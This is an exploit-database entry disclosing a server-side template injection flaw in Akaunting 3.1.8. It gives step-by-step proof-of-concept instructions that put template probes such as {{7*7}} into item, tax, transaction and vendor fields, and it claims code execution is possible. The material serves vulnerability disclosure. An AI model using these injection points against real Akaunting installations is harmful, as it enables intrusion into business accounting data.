header-logo
Suggest Exploit
vendor:
Akaunting
by:
tmrswrr
6.1
CVSS
HIGH
Server-Side Template Injection (SSTI)
94
CWE
Product Name: Akaunting
Affected Version From: 3.1.2008
Affected Version To: 3.1.2008
Patch Exists: NO
Related CWE:
CPE: a:akaunting:akaunting:3.1.8
Metasploit:
Other Scripts:
Platforms Tested:
2024

Akaunting 3.1.8 – Server-Side Template Injection (SSTI)

The Akaunting version 3.1.8 is vulnerable to Server-Side Template Injection (SSTI) where an attacker can inject payload like {{7*7}} in various input fields resulting in arbitrary code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user inputs and restrict the use of dynamic template rendering.
Source

Exploit-DB raw data:

# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI)
# Exploit Author: tmrswrr
# Date: 30/05/2024
# Vendor: https://akaunting.com/forum
# Software Link: https://akaunting.com/apps/crm
# Vulnerable Version(s): 3.1.8
# Tested : https://www.softaculous.com/apps/erp/Akaunting


1 ) Login with admin cred and go to : Items > New Item
    https://127.0.0.1/Akaunting/1/common/items
2 ) Write SSTI payload : {{7*7}}  Name field , write Sale and Purchase Price random numbers
3 ) Save it 
4 ) You will be see result : 
    49
    

====================================================================================

1 ) Login with admin cred and go to :Settings > Taxes > New Tax
    https://127.0.0.1/Akaunting/1/settings/taxes/1/edit
2 ) Write SSTI payload : {{7*7}}  Name field , write Sale and Purchase Price random numbers
3 ) Save it 
4 ) You will be see result : 
    49
    > {{'a'.toUpperCase()}}
    > A
    > {{'a'.concat('b')}}
    > ab
====================================================================================


1 ) Login with admin cred and go to : Banking > Transactions > New Income
https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income
2 ) Write SSTI payload : {{7*7}}  Description field
3 ) Save it 
4 ) You will be see result : 
    49
    > {{'a'.toUpperCase()}}
    > A
    > {{'a'.concat('b')}}
    > ab
    
=======================================================================================

1 ) Login with admin cred
https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit
2 ) Write SSTI payload : {{7*7}}  Name field
3 ) Save it 
4 ) You will be see result : 
    49
    > {{'a'.toUpperCase()}}
    > A
    > {{'a'.concat('b')}}
    > ab

Navigation

Suggest Exploit

Services By CQR